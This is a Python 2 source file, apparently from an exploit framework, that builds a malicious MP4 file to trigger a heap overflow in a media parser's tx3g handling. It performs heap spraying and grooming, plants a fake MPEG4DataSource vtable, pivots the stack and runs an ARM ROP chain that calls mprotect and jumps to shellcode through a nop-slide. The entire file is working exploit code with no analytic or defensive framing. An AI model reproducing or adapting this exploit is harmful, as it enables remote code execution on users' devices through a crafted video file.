#!/usr/bin/python2
# -*- coding: utf-8 -*-

from metaphor_tools import *
from metaphor_base import *

TX3G_HEADER_SIZE = 8

class MetaphorRce(MetaphorBase):
    DEFAULT_CONFIG = \
    {
        # ROP configuration
        'shellcode_offset': PAGE_SIZE,
        'stack_pivot_padding': 0x4c,
        'readAt_offset': 0x1c,

        # Heap shaping configuration
        'fill_size': 0x20,
        'groom_count': 0x50,
        'spray_size': PAGE_SIZE * 0x81,
        'spray_count': 0x40,

        # addresses that we need to predict
        'spray_address': 0xb0000000 + 0x1000,

        # Gadgets:
        'gadgets': \
        {
            'mprotect': 0,
            'stack_pivot': 0,
            'pop_pc': 0,
            'pop_r0_r1_r2_pc': 0
        }
    }

    def __init__(self, config, shellcode, shellcode_thumb, param1, param2, param3):
        self.config = config
        self.gadgets = self.config['gadgets']
        self.shellcode = shellcode
        self.shellcode_thumb = shellcode_thumb
        self.param1, self.param2, self.param3 = param1, param2, param3

    def get_payload(self, size):
        config = self.config
        gadgets = self.gadgets

        if config['shellcode_offset'] + len(self.shellcode) >= size:
            if len(shellcode) < size:
                raise Exception('Shellcode is too large to be placed at this position')
            else:
                raise Exception('Shellcode is too large')

        shellcode_address = config['spray_address'] + config['shellcode_offset']
        if self.shellcode_thumb:
            shellcode_address |= 1

        # Pass mmap aligned address
        spray_page_addess = (config['spray_address'] // PAGE_SIZE) * PAGE_SIZE
        spray_page_size = (size // PAGE_SIZE) * PAGE_SIZE
       
        pivot = p32(0) * (config['readAt_offset'] // 4)
        pivot += p32(gadgets['stack_pivot'])

        payload = ''
                                                            # ///////////////////////////////////
                                                            # // Fake virtual table - in bold  //
                                                            # // followed by fake stack and    //
                                                            # // then nop-slide to shellcode   //
                                                            # ///////////////////////////////////
                                                            # ╔═════════════════════════════════╗
        payload += pivot                                    # ║ stack pivot                     ║
                                                            # ╟═−═−═−═−═−═−═−═−═-═−═−═−═−═−═−═−═╢
        payload += p32(gadgets['pop_r0_r1_r2_pc'])          # │ pop {r0, r1, r2, pc}            │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(spray_page_addess)                   # │ r0 = shellcode address aligned  │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(spray_page_size)                     # │ r1 = size                       │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(PROT_RWX)                            # │ r2 = protection                 │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(gadgets['mprotect'])                 # │ pc = mprotect                   │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(gadgets['pop_r0_r1_r2_pc'])          # │ pop {r0, r1, r2, pc}            │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param1)                         # │ r0 = param1                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param2)                         # │ r1 = param2                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param3)                         # │ r2 = param3                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(shellcode_address)                   # │ pc = shellcode address          │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        # Generate nop-slide, just in case...               # │ nop-slide                       │
        nop = p32(0xbf00bf00)                               # │ ...                             │
        while len(payload) < config['shellcode_offset']:    # │ ...                             │
            payload += nop                                  # │ nop-slide                       │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += self.shellcode                           # │ shellcode                       │
                                                            # └−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┘

        if len(payload) > size:
            print 'Warning: shellcode size is bigger than %u bytes' % (block_size - (len(payload) - len(self.shellcode)))
            
        print 'ROP + Slide + Shellcode: %u bytes' % len(payload)
        pad_len = size - len(payload)
        payload += pad(pad_len)
        
        return payload
    
    def heap_spray(self):
        size = self.config['spray_size']

        payload = self.get_payload(size - PSSH_HEADER_SIZE - STBL_HEADER_SIZE)
        pssh = alloc_pssh_data(payload)
        spray = pssh * self.config['spray_count']
        
        return spray

    def tx3g_data(self):
        vtable_address = self.config['spray_address']
        rop_slide_address = self.config['spray_address'] + self.config['readAt_offset'] + 4

        pad_len = self.config['stack_pivot_padding'] - 4
        overflow_size = self.config['fill_size'] - TX3G_HEADER_SIZE

        # | tx3g | MPEG4DataSource | pssh |
        tx3g_data = pad(overflow_size)

        # | tx3g ----------------> | pssh |
        tx3g_data += p32(vtable_address)     # MPEG4DataSource vtable pointer

        tx3g_data += '\x00' * pad_len        # padding...
        tx3g_data += '\x00\x00\x00\x00'      # r4
        tx3g_data += '\x00\x00\x00\x00'      # r5
        tx3g_data += '\x00\x00\x00\x00'      # r6
        tx3g_data += '\x00\x00\x00\x00'      # r7
        tx3g_data += '\x00\x00\x00\x00'      # r8
        tx3g_data += '\x00\x00\x00\x00'      # r9
        tx3g_data += '\x00\x00\x00\x00'      # r10
        tx3g_data += '\x00\x00\x00\x00'      # r11
        tx3g_data += '\x00\x00\x00\x00'      # r12
        tx3g_data += p32(rop_slide_address)  # sp
        tx3g_data += p32(self.gadgets['pop_pc'])  # lr

        tx3g = chunk('tx3g', tx3g_data)

        return tx3g

    def evil_trak(self):
        data = ''

        # Prepare ROP data
        tx3g_legit = self.tx3g_data()
        data += tx3g_legit

        # Free placeholder #2
        data += alloc_titl(self.config['fill_size'] * 4)
        
        # Allocate MPEG4DataSource
        data += alloc_stbl()
        
        # Free placeholder #1
        data += alloc_gnre(self.config['fill_size'] * 4)

        data += self.tx3g_trigger(len(tx3g_legit), self.config['fill_size'])

        trak = chunk('trak', data)

        return trak

    def exploit_mp4(self):
        data = ''

        # File type header
        ftyp = valid_ftyp()
        data += ftyp

        # Heap spray allocates huge chunks of data
        # hoping to land at a somewhat predictable address
        spray = self.heap_spray()
        data += spray

        # Heap shaping by filling holes
        shape = self.heap_shape()
        data += shape

        # Allocate adjacent placeholders for tx3g buffer and MPEG4DataSource
        data += alloc_titl(self.config['fill_size'])
        data += alloc_gnre(self.config['fill_size'])
        
        # Evil track that exploits the tx3g vulnerability
        trak = self.evil_trak()
        data += trak
        data += valid_trak(valid_moov() + valid_mdhd())

        return data
